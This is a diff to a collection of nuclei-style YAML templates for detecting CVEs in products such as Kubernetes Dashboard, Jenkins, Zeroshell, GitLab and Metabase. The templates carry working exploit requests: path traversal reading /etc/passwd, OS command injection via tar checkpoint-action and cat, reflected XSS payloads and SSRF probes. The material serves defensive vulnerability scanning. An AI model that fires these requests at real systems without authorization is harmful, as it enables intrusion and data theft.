info:
name: Kubernetes Dashboard unauthenticated secret access
author: edoardottt
severity: high
description: Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-18264
cwe-id: CWE-306
metadata:
shodan-query: product:"Kubernetes"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-18264
- https://github.com/kubernetes/dashboard/pull/3289
- https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/
tags: cve,cve2018,kubernetes,k8s,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
- "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- 'contains(body, "apiVersion") && contains(body, "objectRef")'

31
cves/2018/CVE-2018-19365.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2018-19365
info:
name: Wowza Streaming Engine Manager Directory Traversal
author: 0x_Akoko
severity: high
description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request
reference:
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
- https://www.cvedetails.com/cve/CVE-2018-19365
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-19365
cwe-id: CWE-22
tags: cve,cve2018,wowza,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

56
cves/2019/CVE-2019-10405.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2019-10405
info:
name: Diagnostic page exposed Cookie HTTP header
severity: medium
author: c-sh0
description: Jenkins 2.196 and earlier, LTS 2.176.3 and earlier printed the value of the Cookie on the /whoAmI/ URL
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-10405
- https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1505
metadata:
shodan-query: http.favicon.hash:81586312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.30
cve-id: CVE-2019-10405
cwe-id: CWE-200
tags: cve,cve2019,jenkins
requests:
- raw:
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/html'
- 'x-jenkins'
condition: and
case-insensitive: true
- type: word
part: body_2
words:
- 'Cookie'
- 'JSESSIONID'
condition: and
extractors:
- type: kval
kval:
- x_jenkins

9
cves/2019/CVE-2019-12725.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2019-12725
info:
name: Zeroshell 3.9.0 Remote Command Execution
author: dwisiswant0
author: dwisiswant0,akincibor
severity: critical
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
@ -20,14 +20,17 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27"
- "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/04

2
cves/2019/CVE-2019-2767.yaml
View File

@ -22,6 +22,6 @@ requests:
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

31
cves/2020/CVE-2020-13158.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-13158
info:
name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal
author: 0x_Akoko
severity: high
description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.
reference:
- https://github.com/InfoSec4Fun/CVE-2020-13158
- https://sourceforge.net/projects/artica-squid/files/
- https://nvd.nist.gov/vuln/detail/CVE-2020-13158
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-13158
cwe-id: CWE-22
tags: cve,cve2020,artica,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

12
cves/2020/CVE-2020-13937.yaml
View File

@ -1,16 +1,10 @@
id: CVE-2020-13937
info:
name: Apache Kylin Unauth
name: Apache Kylin Exposed Configuration File
author: pikpikcu
severity: medium
description: |
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
reference:
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html
@ -45,3 +39,5 @@ requests:
- kylin.metadata.url
condition: and
part: body
# Enhanced by cs on 2022/02/28

30
cves/2020/CVE-2020-15050.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-15050
info:
name: Suprema BioStar2 - Local File Inclusion (LFI)
author: gy741
severity: high
description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
reference:
- http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
- https://www.supremainc.com/en/support/biostar-2-pakage.asp
- https://nvd.nist.gov/vuln/detail/CVE-2020-15050
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.50
cve-id: CVE-2020-15050
tags: cve,cve2020,lfi,suprema,biostar2
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and

2
cves/2020/CVE-2020-2096.yaml
View File

@ -9,6 +9,8 @@ info:
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10

56
cves/2020/CVE-2020-2103.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2020-2103
info:
name: Diagnostic page exposed session cookies
severity: medium
author: c-sh0
description: Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a users detail object in the whoAmI diagnostic page.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-2103
- https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695
metadata:
shodan-query: http.favicon.hash:81586312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.40
cve-id: CVE-2020-2103
cwe-id: CWE-200
tags: cve,cve2020,jenkins
requests:
- raw:
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/html'
- 'x-jenkins'
condition: and
case-insensitive: true
- type: word
part: body_2
words:
- 'Cookie'
- 'SessionId: null'
condition: and
extractors:
- type: kval
kval:
- x_jenkins

4
cves/2020/CVE-2020-26413.yaml
View File

@ -9,12 +9,14 @@ info:
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275
- https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
- https://nvd.nist.gov/vuln/detail/CVE-2020-26413
tags: cve,cve2020,gitlab,exposure,enum,graphql
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2020-26413
cwe-id: CWE-200
tags: cve,cve2020,gitlab,exposure,enum,graphql
requests:
- raw:

4
cves/2020/CVE-2020-28976.yaml
View File

@ -8,12 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/49189
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,blind
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2020-28976
cwe-id: CWE-918
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast
requests:
- method: GET
@ -27,4 +27,4 @@ requests:
- type: word
part: interactsh_protocol
words:
- "http"
- "http"

30
cves/2020/CVE-2020-35234.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-35234
info:
name: SMTP WP Plugin Directory Listing
author: PR3R00T
severity: high
description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.
remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-35234
- https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
tags: cve,cve2020,wordpress,wp-plugin,smtp
classification:
cve-id: CVE-2020-35234
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/"
- "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"
matchers:
- type: word
words:
- "debug"
- "log"
- "Index of"
condition: and
# Enhanced by cs on 2022/02/28

38
cves/2020/CVE-2020-7943.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2020-7943
info:
name: Puppet Server and PuppetDB sensitive information disclosure
severity: high
author: c-sh0
description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information
reference:
- https://puppet.com/security/cve/CVE-2020-7943
- https://nvd.nist.gov/vuln/detail/CVE-2020-7943
- https://tickets.puppetlabs.com/browse/PDB-4876
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-7943
cwe-id: CWE-276
tags: cve,cve2020,puppet,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/metrics/v1/mbeans"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/json"
- type: word
part: body
words:
- "trapperkeeper"

1
cves/2021/CVE-2021-1497.yaml
View File

@ -43,6 +43,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by cs on 2022/02/14
# Enhanced by cs on 2022/02/16

2
cves/2021/CVE-2021-22205.yaml
View File

@ -13,6 +13,8 @@ info:
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90

42
cves/2021/CVE-2021-22214.yaml
View File

@ -1,33 +1,49 @@
id: CVE-2021-22214
info:
author: Suman_Kar
author: Suman_Kar,GitLab Red Team
name: Unauthenticated Gitlab SSRF - CI Lint API
severity: high
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
description: |
When requests to the internal network for webhooks are enabled,
a server-side request forgery vulnerability in GitLab CE/EE affecting all
versions starting from 10.5 was possible to exploit for an unauthenticated
attacker even on a GitLab instance where registration is limited.
The same vulnerability actually spans multiple CVEs, due to similar reports
that were fixed across seperate patches. These CVEs are:
- CVE-2021-39935
- CVE-2021-22214
- CVE-2021-22175
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- https://nvd.nist.gov/vuln/detail/CVE-2021-39935
- https://nvd.nist.gov/vuln/detail/CVE-2021-22175
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oast
metadata:
shodan-query: http.title:"GitLab"
tags: cve,cve2021,gitlab,ssrf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60
cve-id: CVE-2021-22214
cve-id: CVE-2021-22214,CVE-2021-39935,CVE-2021-22175
cwe-id: CWE-918
requests:
- raw:
- |
POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
content-type: application/json
- method: POST
path:
- "{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"
{"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}
headers:
Content-Type: application/json
body: |
{"content": "include:\n remote: http://127.0.0.1:9100/test.yml"}
redirects: true
max-redirects: 3
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
part: body
words:
- "http"
- "does not have valid YAML syntax"

43
cves/2021/CVE-2021-3002.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2021-3002
info:
name: Seo Panel 4.8.0 - Post based Reflected XSS
author: edoardottt
severity: medium
description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-3002
cwe-id: CWE-79
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3002
- http://www.cinquino.eu/SeoPanelReflect.htm
tags: cve,cve2021,seopanel,xss
requests:
- raw:
- |
POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "<img src=a onerror=alert(document.domain)>"
- "seopanel"
condition: and

7
cves/2021/CVE-2021-3654.yaml
View File

@ -3,12 +3,17 @@ id: CVE-2021-3654
info:
name: noVNC Open Redirect
author: geeknik
severity: low
severity: medium
description: A user-controlled input redirects noVNC users to an external website.
reference:
- https://seclists.org/oss-sec/2021/q3/188
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
tags: redirect,novnc,cve,cve2021
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-3654
cwe-id: CWE-601
requests:
- method: GET

4
cves/2021/CVE-2021-39316.yaml
View File

@ -8,12 +8,12 @@ info:
reference:
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
tags: wordpress,cve2021,cve,lfi,wp-plugin
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-39316
cwe-id: CWE-22
tags: wordpress,cve2021,cve,lfi,wp-plugin,zoomsounds
requests:
- method: GET
@ -29,4 +29,4 @@ requests:
- type: status
status:
- 200
- 200

7
cves/2021/CVE-2021-40868.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2021-40868
info:
name: Cloudron 6.2 Cross Site Scripting
name: Cloudron 6.2 Cross-Site Scripting
author: daffainfo
severity: medium
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
remediation: Upgrade to Cloudron 6.3 or higher.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
@ -35,3 +36,5 @@ requests:
words:
- '</script><script>alert(document.domain)</script>'
part: body
# Enhanced by mp on 2022/03/06

7
cves/2021/CVE-2021-40870.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2021-40870
info:
name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE
name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution
author: pikpikcu
severity: critical
description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
reference:
- https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021
- https://wearetradecraft.com/advisories/tc-2021-0002/
- https://nvd.nist.gov/vuln/detail/CVE-2021-40870
tags: cve,cve2021,rce,aviatrix
@ -41,3 +42,5 @@ requests:
- "PHP Extension"
- "PHP Version"
condition: and
# Enhanced by mp on 2022/03/06

14
cves/2021/CVE-2021-40875.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2021-40875
info:
name: Gurock TestRail Application files.md5 exposure
name: Gurock TestRail Application files.md5 Exposure
author: oscarintherocks
severity: medium
description: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
tags: cve,cve2021,exposure,gurock,testrail
reference:
https://github.com/SakuraSamuraii/derailed
https://johnjhacking.com/blog/cve-2021-40875/
https://www.gurock.com/testrail/tour/enterprise-edition
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
- htttps://github.com/SakuraSamuraii/derailed
- https://johnjhacking.com/blog/cve-2021-40875/
- https://www.gurock.com/testrail/tour/enterprise-edition
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
classification:
cve-id: CVE-2021-40875
metadata:
@ -34,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/06

2
cves/2021/CVE-2021-40960.yaml
View File

@ -30,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/06

7
cves/2021/CVE-2021-40978.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2021-40978
info:
name: mkdocs 1.2.2 built-in dev-server allows directory traversal
name: MKdocs 1.2.2 Directory Traversal
author: pikpikcu
severity: high
reference:
- https://github.com/mkdocs/mkdocs/pull/2604
- https://github.com/nisdn/CVE-2021-40978
- https://nvd.nist.gov/vuln/detail/CVE-2021-40978
tags: cve,cve2021,mkdocs,lfi
description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1."
description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
@ -31,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/06

7
cves/2021/CVE-2021-41174.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2021-41174
info:
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
author: pdteam
severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
remediation: Upgrade to 8.2.3 or higher.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
- https://nvd.nist.gov/vuln/detail/CVE-2021-41174
@ -43,4 +44,6 @@ requests:
- type: regex
group: 1
regex:
- '"subTitle":"Grafana ([a-z0-9.]+)'
- '"subTitle":"Grafana ([a-z0-9.]+)'
# Enhanced by mp on 2022/03/06

7
cves/2021/CVE-2021-41266.yaml
View File

@ -5,7 +5,8 @@ info:
author: alevsk
severity: critical
description: |
Minio console is a graphical user interface for the for MinIO operator. Minio itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. All users on release v0.12.2 and before are affected and are advised to update to 0.12.3 or newer. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.
MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.
remediation: "Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41266
- https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
@ -43,4 +44,6 @@ requests:
- type: word
part: header
words:
- "token"
- "token"
# Enhanced by mp on 2022/03/06

7
cves/2021/CVE-2021-41277.yaml
View File

@ -4,7 +4,8 @@ info:
name: Metabase Local File Inclusion
author: 0x_Akoko
severity: critical
description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you&#8217;re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
description: "Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded."
remediation: "This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application."
reference:
- https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
- https://nvd.nist.gov/vuln/detail/CVE-2021-41277
@ -33,4 +34,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/03/06

5
cves/2021/CVE-2021-41291.yaml
View File

@ -4,8 +4,9 @@ info:
name: ECOA Building Automation System - Directory Traversal Content Disclosure
author: gy741
severity: high
description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41291
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
- https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
tags: cve,cve2021,ecoa,lfi,traversal
@ -25,3 +26,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/03/06

7
cves/2021/CVE-2021-41293.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2021-41293
info:
name: ECOA Building Automation System - LFD
name: ECOA Building Automation System - Local File Disclosure
author: 0x_Akoko
severity: high
description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41293
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
tags: cve,cve2021,ecoa,lfi,disclosure
@ -33,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/07

9
cves/2021/CVE-2021-41349.yaml
View File

@ -1,12 +1,13 @@
id: CVE-2021-41349
info:
name: Pre-Auth POST Based Reflected XSS in Microsoft Exchange
name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting
author: rootxharsh,iamnoooob
severity: medium
tags: cve,cve2021,xss,microsoft,exchange
description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305.
description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
reference:
- https://www.microsoft.com/en-us/download/details.aspx?id=103643
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
- https://nvd.nist.gov/vuln/detail/CVE-2021-41349
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
@ -39,4 +40,6 @@ requests:
- type: status
status:
- 500
- 500
# Enhanced by mp on 2022/03/07

4
cves/2021/CVE-2021-41381.yaml
View File

@ -4,7 +4,7 @@ info:
name: Payara Micro Community 5.2021.6 Directory Traversal
author: pikpikcu
severity: medium
description: Payara Micro Community 5.2021.6 and below allows Directory Traversal
description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
reference:
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
- https://nvd.nist.gov/vuln/detail/CVE-2021-41381
@ -28,3 +28,5 @@ requests:
- "payara.security.openid.sessionScopedConfiguration=true"
condition: and
part: body
# Enhanced by mp on 2022/03/07

8
cves/2021/CVE-2021-41467.yaml
View File

@ -1,13 +1,13 @@
id: CVE-2021-41467
info:
name: JustWriting - Reflected XSS
name: JustWriting - Reflected Cross-Site Scripting
author: madrobot
severity: medium
description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
reference:
- https://github.com/hjue/JustWriting/issues/106
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467
- https://nvd.nist.gov/vuln/detail/CVE-2021-41467
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -36,3 +36,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/03/07

11
cves/2021/CVE-2021-41648.yaml
View File

